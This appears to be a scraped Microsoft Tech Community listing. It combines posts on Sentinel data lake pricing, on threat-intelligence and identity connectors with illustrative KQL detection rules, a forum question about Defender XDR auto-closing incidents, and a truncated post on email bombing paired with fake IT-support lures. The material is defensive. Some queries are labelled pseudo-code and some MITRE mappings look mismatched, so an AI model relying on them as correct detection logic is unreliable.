investigation
308 TopicsUnderstand New Sentinel Pricing Model with Sentinel Data Lake Tier
Introduction on Sentinel and its New Pricing Model Microsoft Sentinel is a cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) platform that collects, analyzes, and correlates security data from across your environment to detect threats and automate response. Traditionally, Sentinel stored all ingested data in the Analytics tier (Log Analytics workspace), which is powerful but expensive for high-volume logs. To reduce cost and enable customers to retain all security data without compromise, Microsoft introduced a new dual-tier pricing model consisting of the Analytics tier and the Data Lake tier. The Analytics tier continues to support fast, real-time querying and analytics for core security scenarios, while the new Data Lake tier provides very low-cost storage for long-term retention and high-volume datasets. Customers can now choose where each data type lands—analytics for high-value detections and investigations, and data lake for large or archival types—allowing organizations to significantly lower cost while still retaining all their security data for analytics, compliance, and hunting. Please flow diagram depicts new sentinel pricing model: Now let's understand this new pricing model with below scenarios: Scenario 1A (PAY GO) Scenario 1B (Usage Commitment) Scenario 2 (Data Lake Tier Only) Scenario 1A (PAY GO) Requirement Suppose you need to ingest 10 GB of data per day, and you must retain that data for 2 years. However, you will only frequently use, query, and analyze the data for the first 6 months. Solution To optimize cost, you can ingest the data into the Analytics tier and retain it there for the first 6 months, where active querying and investigation happen. After that period, the remaining 18 months of retention can be shifted to the Data Lake tier, which provides low-cost storage for compliance and auditing needs. But you will be charged separately for data lake tier querying and analytics which depicted as Compute (D) in pricing flow diagram. Pricing Flow / Notes The first 10 GB/day ingested into the Analytics tier is free for 31 days under the Analytics logs plan. All data ingested into the Analytics tier is automatically mirrored to the Data Lake tier at no additional ingestion or retention cost. For the first 6 months, you pay only for Analytics tier ingestion and retention, excluding any free capacity. For the next 18 months, you pay only for Data Lake tier retention, which is significantly cheaper. Azure Pricing Calculator Equivalent Assuming no data is queried or analyzed during the 18-month Data Lake tier retention period: Although the Analytics tier retention is set to 6 months, the first 3 months of retention fall under the free retention limit, so retention charges apply only for the remaining 3 months of the analytics retention window. Azure pricing calculator will adjust accordingly. Scenario 1B (Usage Commitment) Now, suppose you are ingesting 100 GB per day. If you follow the same pay-as-you-go pricing model described above, your estimated cost would be approximately $15,204 per month. However, you can reduce this cost by choosing a Commitment Tier, where Analytics tier ingestion is billed at a discounted rate. Note that the discount applies only to Analytics tier ingestion—it does not apply to Analytics tier retention costs or to any Data Lake tier–related charges. Please refer to the pricing flow and the equivalent pricing calculator results shown below. Monthly cost savings: $15,204 – $11,184 = $4,020 per month Now the question is: What happens if your usage reaches 150 GB per day? Will the additional 50 GB be billed at the Pay-As-You-Go rate? No. The entire 150 GB/day will still be billed at the discounted rate associated with the 100 GB/day commitment tier bucket. Azure Pricing Calculator Equivalent (100 GB/ Day) Azure Pricing Calculator Equivalent (150 GB/ Day) Scenario 2 (Data Lake Tier Only) Requirement Suppose you need to store certain audit or compliance logs amounting to 10 GB per day. These logs are not used for querying, analytics, or investigations on a regular basis, but must be retained for 2 years as per your organization’s compliance or forensic policies. Solution Since these logs are not actively analyzed, you should avoid ingesting them into the Analytics tier, which is more expensive and optimized for active querying. Instead, send them directly to the Data Lake tier, where they can be retained cost-effectively for future audit, compliance, or forensic needs. Pricing Flow Because the data is ingested directly into the Data Lake tier, you pay both ingestion and retention costs there for the entire 2-year period. If, at any point in the future, you need to perform advanced analytics, querying, or search, you will incur additional compute charges, based on actual usage. Even with occasional compute charges, the cost remains significantly lower than storing the same data in the Analytics tier. Realized Savings Scenario Cost per Month Scenario 1: 10 GB/day in Analytics tier $1,520.40 Scenario 2: 10 GB/day directly into Data Lake tier $202.20 (without compute) $257.20 (with sample compute price) Savings with no compute activity: $1,520.40 – $202.20 = $1,318.20 per month Savings with some compute activity (sample value): $1,520.40 – $257.20 = $1,263.20 per month Azure calculator equivalent without compute Azure calculator equivalent with Sample Compute Conclusion The combination of the Analytics tier and the Data Lake tier in Microsoft Sentinel enables organizations to optimize cost based on how their security data is used. High-value logs that require frequent querying, real-time analytics, and investigation can be stored in the Analytics tier, which provides powerful search performance and built-in detection capabilities. At the same time, large-volume or infrequently accessed logs—such as audit, compliance, or long-term retention data—can be directed to the Data Lake tier, which offers dramatically lower storage and ingestion costs. Because all Analytics tier data is automatically mirrored to the Data Lake tier at no extra cost, customers can use the Analytics tier only for the period they actively query data, and rely on the Data Lake tier for the remaining retention. This tiered model allows different scenarios—active investigation, archival storage, compliance retention, or large-scale telemetry ingestion—to be handled at the most cost-effective layer, ultimately delivering substantial savings without sacrificing visibility, retention, or future analytical capabilities.1.5KViews2likes2CommentsThreat Intelligence & Identity Ecosystem Connectors
Microsoft Sentinel’s capability can be greatly enhanced by integrating third-party threat intelligence (TI) feeds (e.g. GreyNoise, Team Cymru) with identity and access logs (e.g. OneLogin, PingOne). This article provides a detailed dive into each connector, data types, and best practices for enrichment and false-positive reduction. We cover how GreyNoise (including PureSignal/Scout), Team Cymru, OneLogin IAM, PingOne, and Keeper integrate with Sentinel – including available connectors, ingested schemas, and configuration. We then outline technical patterns for building TI-based lookup pipelines, scoring, and suppression rules to filter benign noise (e.g. GreyNoise’s known scanners), and enrich alerts with context from identity logs. We map attack chains (credential stuffing, lateral movement, account takeover) to Sentinel data, and propose KQL analytics rules and playbooks with MITRE ATT&CK mappings (e.g. T1110: Brute Force, T1595: Active Scanning). The report also includes guidance on deployment (ARM/Bicep examples), performance considerations for high-volume TI ingestion, and comparison tables of connector features. A mermaid flowchart illustrates the data flow from TI and identity sources into Sentinel analytics. All recommendations are drawn from official documentation and industry sources. Threat Intel & Identity Connectors Overview GreyNoise (TI Feed): GreyNoise provides “internet background noise” intelligence on IPs seen scanning or probing the Internet. The Sentinel GreyNoise Threat Intelligence connector (Azure Marketplace) pulls data via GreyNoise’s API into Sentinel’s ThreatIntelligenceIndicator table. It uses a daily Azure Function to fetch indicators (IP addresses and metadata like classification, noise, last_seen) and injects them as STIX-format indicators (Network IPs with provider “GreyNoise”). This feed can then be queried in KQL. Authentication requires a GreyNoise API key and a Sentinel workspace app with Contributor rights. GreyNoise’s goal is to help “filter out known opportunistic traffic” so analysts can focus on real threats. Official docs describe deploying the content pack and workbook template. Ingested data: IP-based indicators (malicious vs. benign scans), classifications (noise, riot, etc.), organization names, last-seen dates. All fields from GreyNoise’s IP lookup (e.g. classification, last_seen) appear in ThreatIntelligenceIndicator.NetworkDestinationIP, IndicatorProvider="GreyNoise", and related fields. Query: ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" | summarize arg_max(TimeGenerated, *) by NetworkDestinationIP This yields the latest GreyNoise record per IP. Team Cymru Scout (TI Context): Team Cymru’s PureSignal™ Scout is a TI enrichment platform. The Team Cymru Scout connector (via Azure Marketplace) ingests contextual data (not raw logs) about IPs, domains, and account usage into Sentinel custom tables. It runs via an Azure Function that, given IP or domain inputs, populates tables like Cymru_Scout_IP_Data_* and Cymru_Scout_Domain_Data_CL. For example, an IP query yields multiple tables: Cymru_Scout_IP_Data_Foundation_CL, ..._OpenPorts_CL, ..._PDNS_CL, etc., containing open ports, passive DNS history, X.509 cert info, fingerprint data, etc. This feed requires a Team Cymru account (username/password) to access the Scout API. Data types: Structured TI metadata by IP/domain. No native ThreatIndicator insertion; instead, analysts query these tables to enrich events (e.g. join on SourceIP). The Sentintel TechCommunity notes that Scout “enriches alerts with real-time context on IPs, domains, and adversary infrastructure” and can help “reduce false positives”. OneLogin IAM (Identity Logs): The OneLogin IAM solution (Microsoft Sentinel content pack) ingests OneLogin platform events and user info via OneLogin’s REST API. Using the Codeless Connector Framework, it pulls from OneLogin’s Events API and Users API, storing data in custom tables OneLoginEventsV2_CL and OneLoginUsersV2_CL. Typical events include user sign-ins, MFA actions, app accesses, admin changes, etc. Prerequisites: create an OpenID Connect app in OneLogin (for client ID/secret) and register it in Azure (Global Admin). The connector queries hourly (or on schedule), within OneLogin’s rate limit of 5000 calls/hour. Data mapping: OneLoginEventsV2_CL (CL suffix indicates custom log) holds event records (time, user, IP, event type, result, etc.); OneLoginUsersV2_CL contains user account attributes. These can be joined or used in analytics. For example, a query might look for failed login events: OneLoginEventsV2_CL | where Event_type_s == "UserSessionStart" and Result_s == "Failed" (Actual field names depend on schema.) PingOne (Identity Logs): The PingOne Audit connector ingests audit activity from the PingOne Identity platform via its REST API. It creates the table PingOne_AuditActivitiesV2_CL. This includes administrator actions, user logins, console events, etc. You configure a PingOne API client (Client ID/Secret) and set up the Codeless Connector Framework. Logs are retrieved (with attention to PingOne’s license-based rate limits) and appended to the custom table. Analysts can query, for instance, PingOne_AuditActivitiesV2_CL for events like MFA failures or profile changes. Keeper (Password Vault Logs – optional): Keeper, a password management platform, can forward security events to Sentinel via Azure Monitor. As of latest docs, logs are sent to a custom log table (commonly KeeperLogs_CL) using Azure Data Collection Rules. In Keeper’s guide, you register an Azure AD app (“KeeperLogging”) and configure Azure Monitor data collection; then in the Keeper Admin Console you specify the DCR endpoint. Keeper events (e.g. user logins, vault actions, admin changes) are ingested into the table named (e.g.) Custom-KeeperLogs_CL. Authentication uses the app’s client ID/secret and a monitor endpoint URL. This is a bulk ingest of records, rather than a scheduled pull. Data ingested: custom Keeper events with fields like user, action, timestamp. Keeper’s integration is essentially via Azure Monitor (in the older Azure Sentinel approach). Connector Configuration & Data Ingestion Authentication and Rate Limits: Most connectors require API keys or OAuth credentials. GreyNoise and Team Cymru use single keys/credentials, with the Azure Function secured by a Managed Identity. OneLogin and PingOne use client ID/secret and must respect their API limits (OneLogin ~5k calls/hour; PingOne depends on licensing). GreyNoise’s enterprise API allows bulk lookups; the community API is limited (10/day for free), so production integration requires an Enterprise plan. Sentinel Tables: Data is inserted either into built-in tables or custom tables. GreyNoise feeds the ThreatIntelligenceIndicator table, populating fields like NetworkDestinationIP and ThreatSeverity (higher if classified “malicious”). Team Cymru’s Scout connector creates many Cymru_Scout_*_CL tables. OneLogin’s solution populates OneLoginEventsV2_CL and OneLoginUsersV2_CL. PingOne yields PingOne_AuditActivitiesV2_CL. Keeper logs appear in a custom table (e.g. KeeperLogs_CL) as shown in Keeper’s guide. Note: Sentinel’s built-in identity tables (IdentityInfo, SigninLogs) are typically for Microsoft identities; third-party logs can be mapped to them via parsers or custom analytic rules but by default arrive in these custom tables. Data Types & Schema: Threat Indicators: In ThreatIntelligenceIndicator, GreyNoise IPs appear as NetworkDestinationIP with associated fields (e.g. ThreatSeverity, IndicatorProvider="GreyNoise", ConfidenceScore, etc.). (Future STIX tables may be used after 2025.) Custom CL Logs: OneLogin events may include fields such as user_id_s, user_login_s, client_ip_s, event_time, etc. (The published parser issues indicate fields like app_name_s, role_id_d, etc.) PingOne logs include eventType, user, clientIP, result. Keeper logs contain Action, UserName, etc. These raw fields can be normalized in analytic rules or parsed by data transformations. Identity Info: Although not directly ingested, identity attributes from OneLogin/PingOne (e.g. user roles, group IDs) could be periodically fetched and synced to Sentinel (via custom logic) to populate IdentityInfo records, aiding user-centric hunts. Configuration Steps : GreyNoise: In Sentinel Content Hub, install the GreyNoise ThreatIntel solution. Enter your GreyNoise API key when prompted. The solution deploys an Azure Function (requires write access to Functions) and sets up an ingestion schedule. Verify the ThreatIntelligenceIndicator table is receiving GreyNoise entries Team Cymru: From Marketplace install “Team Cymru Scout”. Provide Scout credentials. The solution creates an Azure Function app. It defines a workflow to ingest or lookup IPs/domains. (Often, analysts trigger lookups rather than scheduled ingestion, since Scout is lookup-based.) Ensure roles: the Function’s managed identity needs Sentinel contributor rights. OneLogin: Use the Data Connectors UI. Authenticate OneLogin by creating a new Sentinel Web API authentication (with OneLogin’s client ID/secret). Enable both “OneLogin Events” and “OneLogin Users”. No agent is needed. After setup, data flows into OneLoginEventsV2_CL. PingOne: Similarly, configure the PingOne connector. Use the PingOne administrative console to register an OAuth client. In Sentinel’s connector blade, enter the client ID/secret and specify desired log types (Audit, maybe IDP logs). Confirm PingOne_AuditActivitiesV2_CL populates hourly. Keeper: Register an Azure AD app (“KeeperLogging”) and assign it Monitoring roles (Publisher/Contributor) to your workspace and data collection endpoint. Create an Azure Data Collection Rule (DCR) and table (e.g. KeeperLogs_CL). In Keeper’s Admin Console (Reporting & Alerts → Azure Monitor), enter the tenant ID, client ID/secret, and the DCR endpoint URL (format: https://<DCE>/dataCollectionRules/<DCR_ID>/streams/<table>?api-version=2023-01-01). Keeper will then push logs. KQL Lookup: To enrich a Sentinel event with these feeds, you might write: OneLoginEventsV2_CL | where EventType == "UserLogin" and Result == "Success" | extend UserIP = ClientIP_s | join kind=inner ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 3 | project NetworkDestinationIP, Category ) on $left.UserIP == $right.NetworkDestinationIP This joins OneLogin sign-ins with GreyNoise’s list of malicious scanners. Enrichment & False-Positive Reduction IOC Enrichment Pipelines: A robust TI pipeline in Sentinel often uses Lookup Tables and Functions. For example, ingested TI (from GreyNoise or Team Cymru) can be stored in reference data or scheduled lookup tables to enrich incoming logs. Patterns include: - Normalization: Normalize diverse feeds into common STIX schema fields (e.g. all IPs to NetworkDestinationIP, all domains to DomainName) so rules can treat them uniformly. - Confidence Scoring: Assign a confidence score to each indicator (from vendor or based on recency/frequency). For GreyNoise, for instance, you might use classification (e.g. “malicious” vs. “benign”) and history to score IP reputation. In Sentinel’s ThreatIntelligenceIndicator.ConfidenceScore field you can set values (higher for high-confidence IOCs, lower for noisy ones). - TTL & Freshness: Some indicators (e.g. active C2 domains) expire, so setting a Time-To-Live is critical. Sentinel ingestion rules or parsers should use ExpirationDateTime or ValidUntil on indicators to avoid stale IOCs. For example, extend ValidUntil only if confidence is high. - Conflict Resolution: When the same IOC comes from multiple sources (e.g. an IP in both GreyNoise and TeamCymru), you can either merge metadata or choose the highest confidence. One approach: use the highest threat severity from any source. Sentinel’s ThreatType tags (e.g. malicious-traffic) can accommodate multiple providers. False-Positive Reduction Techniques: - GreyNoise Noise Scoring: GreyNoise’s primary utility is filtering. If an IP is labeled noise=true (i.e. just scanning, not actively malicious), rules can deprioritize alerts involving that IP. E.g. suppress an alert if its source IP appears in GreyNoise as benign scanner. - Team Cymru Reputation: Use Scout data to gauge risk; e.g. if an IP’s open port fingerprint or domain history shows no malicious tags, it may be low-risk. Conversely, known hostile IP (e.g. seen in ransomware networks) should raise alert level. Scout’s thousands of context tags help refine a binary IOC. - Contextual Identity Signals: Leverage OneLogin/PingOne context to filter alerts. For instance, if a sign-in event is associated with a high-risk location (e.g. new country) and the IP is a GreyNoise scan, flag it. If an IP is marked benign, drop or suppress. Correlate login failures: if a single IP causes many failures across multiple users, it might be credential stuffing (T1110) – but if that IP is known benign scanner, consider it low priority. - Thresholding & Suppression: Build analytic suppression rules. Example: only alert on >5 failed logins in 5 min from IP and that IP is not noise. Or ignore DNS queries to domains that TI flags as benign/whitelisted. Apply tag-based rules: some connectors allow tagging known internal assets or trusted scan ranges to avoid alerts. Use GreyNoise to suppress alerts: SecurityEvent | where EventID == 4625 and Account != "SYSTEM" | join kind=leftanti ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and Classification == "benign" | project NetworkSourceIP ) on $left.IPAddress == $right.NetworkSourceIP This rule filters out Windows 4625 login failures originating from GreyNoise-known benign scanners. Identity Attack Chains & Detection Rules Modern account attacks often involve sequential activities. By combining identity logs with TI, we can detect advanced patterns. Below are common chains and rule ideas: Credential Stuffing (MITRE T1110): Often seen as many login failures followed by a success. Detection: Look for multiple failed OneLogin/PingOne sign-ins for the same or different accounts from a single IP, then a success. Enrich with GreyNoise: if the source IP is in GreyNoise (indicating scanning), raise severity. Rule: let SuspiciousIP = OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Failed" | summarize CountFailed=count() by ClientIP_s | where CountFailed > 5; OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Success" and ClientIP_s in (SuspiciousIP | project ClientIP_s) | join kind=inner ( ThreatIntelligenceIndicator | where ThreatType == "ip" | extend GreyNoiseClass = tostring(Classification) | project IP=NetworkSourceIP, GreyNoiseClass ) on $left.ClientIP_s == $right.IP | where GreyNoiseClass == "malicious" | project TimeGenerated, Account_s, ClientIP_s, GreyNoiseClass Tactics: Initial Access (T1110) – Severity: High. Account Takeover / Impossible Travel (T1198): Sign-ins from unusual geographies or devices. Detection: Compare user’s current sign-in location against historical baseline. Use OneLogin/PingOne logs: if two logins by same user occur in different countries with insufficient time to travel, trigger. Enrich: if the login IP is also known infrastructure (Team Cymru PDNS, etc.), raise alert. Rule: PingOne_AuditActivitiesV2_CL | where EventType_s == "UserLogin" | extend loc = tostring(City_s) + ", " + tostring(Country_s) | sort by TimeGenerated desc | partition by User_s ( where TimeGenerated < ago(24h) // check last day | summarize count(), min(TimeGenerated), max(TimeGenerated) ) | where max_TimeGenerated - min_TimeGenerated < 1h and count_>1 and (range(loc) contains ",") | project User_s, TimeGenerated, loc (This pseudo-query checks multiple locations in <1 hour.) Tactics: Reconnaissance / Initial Access – Severity: Medium. Lateral Movement (T1021): Use of an account on multiple systems/apps. Detection: Two or more distinct application/service authentications by same user within a short time. Use OneLogin app-id fields or audit logs for access. If these are followed by suspicious network activity (e.g. contacting C2 via GreyNoise), escalate. Tactics: Lateral Movement – Severity: High. Privilege Escalation (T1098): If an admin account is changed or MFA factors reset in OneLogin/PingOne, especially after anomalous login. Detection: Monitor OneLogin admin events (“User updated”, “MFA enrolled/removed”). Cross-check the actor’s IP against threat feeds. Tactics: Credential Access – Severity: High. Analytics Rules (KQL) Below are six illustrative Sentinel analytics rules combining TI and identity logs. Each rule shows logic, tactics, severity, and MITRE IDs. (Adjust field names per your schemas and normalize CL tables as needed.) Multiple Failed Logins from Malicious Scanner (T1110) – High severity. Detect credential stuffing by identifying >5 failed login attempts from the same IP, where that IP is classified as malicious by GreyNoise. let BadIP = OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Failed" | summarize attempts=count() by SourceIP_s | where attempts >= 5; OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Success" and SourceIP_s in (BadIP | project SourceIP_s) | join ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 4 | project MaliciousIP=NetworkDestinationIP ) on $left.SourceIP_s == $right.MaliciousIP | extend AttackFlow="CredentialStuffing", MITRE="T1110" | project TimeGenerated, UserName_s, SourceIP_s, MaliciousIP Logic: Correlate failed-then-success login from same IP plus GreyNoise-malign classification. Impossible Travel / Anomalous Geo (T1198) – Medium severity. A user signs in from two distant locations within an hour. // Get last two logins per user let lastLogins = PingOne_AuditActivitiesV2_CL | where EventType_s == "UserLogin" and Outcome_s == "Success" | sort by TimeGenerated desc | summarize first_place=arg_max(TimeGenerated, City_s, Country_s, SourceIP_s, TimeGenerated) by User_s; let prevLogins = PingOne_AuditActivitiesV2_CL | where EventType_s == "UserLogin" and Outcome_s == "Success" | sort by TimeGenerated desc | summarize last_place=arg_min(TimeGenerated, City_s, Country_s, SourceIP_s, TimeGenerated) by User_s; lastLogins | join kind=inner prevLogins on User_s | extend dist=geo_distance_2points(first_place_City_s, first_place_Country_s, last_place_City_s, last_place_Country_s) | where dist > 1000 and (first_place_TimeGenerated - last_place_TimeGenerated) < 1h | project Time=first_place_TimeGenerated, User=User_s, From=last_place_Country_s, To=first_place_Country_s, MITRE="T1198" Logic: Compute geographic distance between last two logins; flag if too far too fast. Suspicious Admin Change (T1098) – High severity. Detect a change to admin settings (like role assign or MFA reset) via PingOne, from a high-risk IP (Team Cymru or GreyNoise) or after failed logins. PingOne_AuditActivitiesV2_CL | where EventType_s in ("UserMFAReset", "UserRoleChange") // example admin events | extend ActorIP = tostring(InitiatingIP_s) | join ( ThreatIntelligenceIndicator | where ThreatSeverity >= 3 | project BadIP=NetworkDestinationIP ) on $left.ActorIP == $right.BadIP | extend MITRE="T1098" | project TimeGenerated, ActorUser_s, Action=EventType_s, ActorIP Logic: Raise if an admin action originates from known bad IP. Malicious Domain Access (T1498): Medium severity. Internal logs (e.g. DNS or Web proxy) show access to a domain listed by Team Cymru Scout as C2 or reconnaissance. DeviceDnsEvents | where QueryType == "A" | join kind=inner ( Cymru_Scout_Domain_Data_CL | where ThreatTag_s == "Command-and-Control" | project DomainName_s ) on $left.QueryText == $right.DomainName_s | extend MITRE="T1498" | project TimeGenerated, DeviceName, QueryText Logic: Correlate internal DNS queries with Scout’s flagged C2 domains. (Requires that domain data is ingested or synced.) Brute-Force Firewall Blocked IP (T1110): Low to Medium severity. Firewall logs show an IP blocked for many attempts, and that IP is not noise per GreyNoise (i.e., malicious scanner). AzureDiagnostics | where Category == "NetworkSecurityGroupFlowEvent" and msg_s contains "DIRECTION=Inbound" and Action_s == "Deny" | summarize attemptCount=count() by IP = SourceIp_s, FlowTime=bin(TimeGenerated, 1h) | where attemptCount > 50 | join kind=leftanti ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and Classification == "benign" | project NoiseIP=NetworkDestinationIP ) on $left.IP == $right.NoiseIP | extend MITRE="T1110" | project IP, attemptCount, FlowTime Logic: Many inbound denies (possible brute force) from an IP not whitelisted by GreyNoise. New Device Enrolled (T1078): Low severity. A user enrolls a new device or location for MFA after unusual login. OneLoginEventsV2_CL | where EventType == "NewDeviceEnrollment" | join kind=inner ( OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Success" | top 1 by TimeGenerated asc // assume prior login | project User_s, loginTime=TimeGenerated, loginIP=ClientIP_s ) on User_s | where loginIP != DeviceIP_s | extend MITRE="T1078" | project TimeGenerated, User_s, DeviceIP_s, loginIP Logic: Flag if new device added (strong evidence of account compromise). Note: The above rules are illustrative. Tune threshold values (e.g. attempt counts) to your environment. Map the event fields (EventType, Result, etc.) to your actual schema. Use Severity mapping in rule configs as indicated and tag with MITRE IDs for context. TI-Driven Playbooks and Automation Automated response can amplify TI. Patterns include: - IOC Blocking: On alert (e.g. suspicious IP login), an automation runbook can call Azure Firewall, Azure Defender, or external firewall APIs to block the offending IP. For instance, a Logic App could trigger on the analytic alert, use the TI feed IP, and call AzFWNetworkRule PowerShell to add a deny rule. - Enrichment Workflow: After an alert triggers, an Azure Logic App playbook can enrich the incident by querying TI APIs. E.g., given an IP from the alert, call GreyNoise API or Team Cymru Scout API in real-time (via HTTP action), add the classification into incident details, and tag the incident accordingly (e.g. GreyNoiseStatus: malicious). This adds context for the analyst. - Alert Suppression: Implement playbook-driven suppression. For example, an alert triggered by an external IP can invoke a playbook that checks GreyNoise; if the IP is benign, the playbook can auto-close the alert or mark as false-positive, reducing analyst load. - Automated TI Feed Updates: Periodically fetch open-source or commercial TI and use a playbook to push new indicators into Sentinel’s TI store via the Graph API. - Incident Enrichment: On incident creation, a playbook could query OneLogin/PingOne for additional user details (like department or location via their APIs) and add as note in the incident. Performance, Scalability & Costs TI feeds and identity logs can be high-volume. Key considerations: - Data Ingestion Costs: Every log and TI indicator ingested into Sentinel is billable by the GB. Bulk TI indicator ingestion (like GreyNoise pulling thousands of IPs/day) can add storage costs. Use Sentinel’s Data Collection Rules (DCR) to apply ingestion-time filters (e.g. only store indicators above a confidence threshold) to reduce volume. GreyNoise feed is typically modest (since it’s daily, maybe thousands of IPs). Identity logs (OneLogin/PingOne) depend on org size – could be megabytes per day. Use sentinel ingestion sl analytic filters to drop low-value logs. - Query Performance: Custom log tables (OneLogin, PingOne, KeeperLogs_CL) can grow large. Periodically archive old data (e.g. export >90 days to storage, then purge). Use materialized views or scheduled summary tables for heavy queries (e.g. pre-aggregate hourly login counts). For threat indicator tables, leverage built-in indices on IndicatorId and NetworkIP for fast joins. Use project-away _* to remove metadata from large join queries. - Retention & Storage: Configure retention per table. If historical TI is less needed, set shorter retention. Use Azure Monitor’s tiering/Archive for seldom-used data. For large TI volumes (e.g. feeding multiple TIPs), consider using Sentinel Data Lake (or connecting Log Analytics to ADLS Gen2) to offload raw ingest cheaply. - Scale-Out Architecture: For very large environments, use multiple Sentinel workspaces (e.g. regional) and aggregate logs via Azure Lighthouse or Sentinel Fusion. TI feeds can be shared: one workspace collects TI, then distribute to others via Azure Sentinel’s TI management (feeds can be published and shared cross-workspaces). - Connector Limits: API rate limits dictate update frequency. Schedule connectors accordingly (e.g. daily for TI, hourly for identity events). Avoid hourly pulls of already static data (users list can be daily). For OneLogin/PingOne, use incremental tokens or webhooks if possible to reduce load. - Monitoring Health: Use Sentinel’s Log Analytics and Monitor metrics to track ingestion volume and connector errors. For example, monitor the Functions running GreyNoise/Scout for failures or throttling. Deployment Checklist & Guide Prepare Sentinel Workspace: Ensure a Log Analytics workspace with Sentinel enabled. Record the workspace ID and region. Register Applications: In Azure AD, create and note any Service Principal needed for functions or connectors (e.g. a Sentinel-managed identity for Functions). In each vendor portal, register API apps and credentials (OneLogin OIDC App, PingOne API client, Keeper AD app). Network & Security: If needed, configure firewall rules to allow outbound to vendor APIs. Install Connectors: In Sentinel Content Hub or Marketplace, install the solutions for GreyNoise TI, Team Cymru Scout, OneLogin IAM, PingOne. Follow each wizard to input credentials. Verify the “Data Types” (Logs, Alerts, etc.) are enabled. Create Tables & Parsers (if manual): For Keeper or unsupported logs, manually create custom tables (via DCR in Azure portal). Import JSON to define fields as shown in Keeper’s docs Test Data Flow: After each setup, wait 1–24 hours and run a simple query on the destination table (e.g. OneLoginEventsV2_CL | take 5) to confirm ingestion. Deploy Ingestion Rules: Use Sentinel Threat intelligence ingestion rules to fine-tune feeds (e.g. mark high-confidence feeds to extend expiration). Optionally tag/whitelist known good. Configure Analytics: Enable or create rules using the KQL above. Place them in the correct threat hunting or incident rule categories (Credential Access, Lateral Movement, etc.). Assign appropriate alert severity. Set up Playbooks: For automated actions (alert enrichment, IOC blocking), create Logic App playbooks. Test with mock alerts (dry run) to ensure correct API calls. Tuning & Baseline: After initial alerts, tune queries (thresholds, whitelists) to reduce noise. Maintain suppression lists (e.g. internal pentest IPs). Use the MITRE mapping in rule details for clarity. Documentation & Training: Document field mappings (e.g. OneLoginEvents fields), and train SOC staff on new TI-enriched alert fields. Connectors Comparison Connector Data Sources Sent. Tables Update Freq. Auth Method Key Fields Enriched Limits/Cost Pros/Cons GreyNoise IP intelligence (scanners) ThreatIntelligenceIndicator Daily (scheduled pull) API Key IP classification, noise, classification API key required; paid license for large usage Pros: Filters benign scans, broad scan visibility Con: Only IP-based (no domain/file). Team Cymru Scout Global IP/domain telemetry Cymru_Scout_*_CL (custom tables) On-demand or daily Account credentials Detailed IP/domain context (ports, PDNS, ASN, etc.) Requires Team Cymru subscription. Potentially high cost for feed. Pros: Rich context (open ports, DNS, certs); great for IOC enrichment. Con: Complex setup, data in custom tables only. OneLogin IAM OneLogin user/auth logs OneLoginEventsV2_CL, OneLoginUsersV2_CL Polls hourly OAuth2 (client ID/secret) User, app, IP, event type (login, MFA, etc.) OneLogin API: 5K calls/hour. Data volume moderate. Pros: Direct insight into cloud identity use; built-in parser available. Cons: Limited to OneLogin environment only. PingOne Audit PingOne audit logs PingOne_AuditActivitiesV2_CL Polls hourly OAuth2 (client ID/secret) User actions, admin events, MFA logs Rate limited by Ping license. Data volume moderate. Pros: Captures critical identity events; widely used product. Cons: Requires PingOne Advanced license for audit logs. Keeper (custom) Keeper security events KeeperLogs_CL (custom) Push (continuous) OAuth2 (client ID/secret) + Azure DCR Vault logins, record accesses, admin changes None (push model); storage costs. Pros: Visibility into password vault activity (often blind spot). Cons: More manual setup; custom logs not parsed by default. Data Flow Diagram This flowchart shows GreyNoise (GN) feeding the Threat Intelligence table, Team Cymru feeding enrichment tables, and identity sources pushing logs. All data converges into Sentinel, where enrichment lookups inform analytics and automated responses.103Views4likes0CommentsObserved Automation Discrepancies
Hi Team ... I want to know the logic behind the Defender XDR Automation Engine . How it works ? I have observed Defender XDR Automation Engine Behavior contrary to expectations of identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching their SOC for review, raising concerns among clients and colleagues. Automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent . A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. Wherein the automation was not triggered by our own rules, but by Microsoft's Defender XDR, and sought clarification on the underlying logic.53Views2likes3CommentsProtection Against Email Bombs with Microsoft Defender for Office 365
In today's digital age, email remains a critical communication tool for businesses and individuals. However, with the increasing sophistication of cyberattacks, email security has become more important than ever. One such threat that has been growing is the email bombing, a form of net abuse that sends large volumes of email to an address to overflow the mailbox, overwhelm the server, or distract attention from important email messages indicating a security breach. Email bomb - Wikipedia Understanding Email Bombing Email bombing, typically involves subscribing victims to a large number of legitimate newsletter and subscription services. Each subscription service sends email notifications, which in aggregate create a large stream of emails into the victim’s inbox, making email triage for legitimate emails very difficult. This form of attack is essentially a denial-of-service (DDOS) on the victim's email triaging attention budget. Hybrid Attacks More recently, email subscription bombs have been coupled with simultaneous lures on Microsoft Teams, Zoom, or via phone calls. Attackers impersonate IT support and offer to help solve the email problem caused by the spike of unwanted emails, ultimately compromising the victim's system or installing malware on their system. This type of attack is brilliant because it creates a sense of urgency and legitimacy, making victims more likely to accept remote assistance and inadvertently allow malware planting or data theft. Read about the use of mail bombs where threat actors misused Quick Assist in social engineering attacks leading to ransomware | Microsoft Security Blog. Incidence and Purpose of Email Bombing Email bombing attacks have been around for many years but can have significant impacts on targeted individuals, such as enterprise executives, HR or finance representatives. These attacks are often used as precursors to more serious security incidents, including malware planting, ransomware, and data exfiltration. They can also mute important security alerts, making it easier for attackers to carry out fraudulent activities without detection. New Detection technology for Mail Bombing attacks To address these types of attacks Microsoft Defender has now released a comprehensive solution involving a durable block to limit the influx of emails, the majority of which are often spam. By intelligently tracking message volumes across different sources and time intervals, this new detection leverages historical patterns of the sender and signals related to spam content. It prevents mail bombs from being dropped into the user’s inbox and the messages are rather sent to the 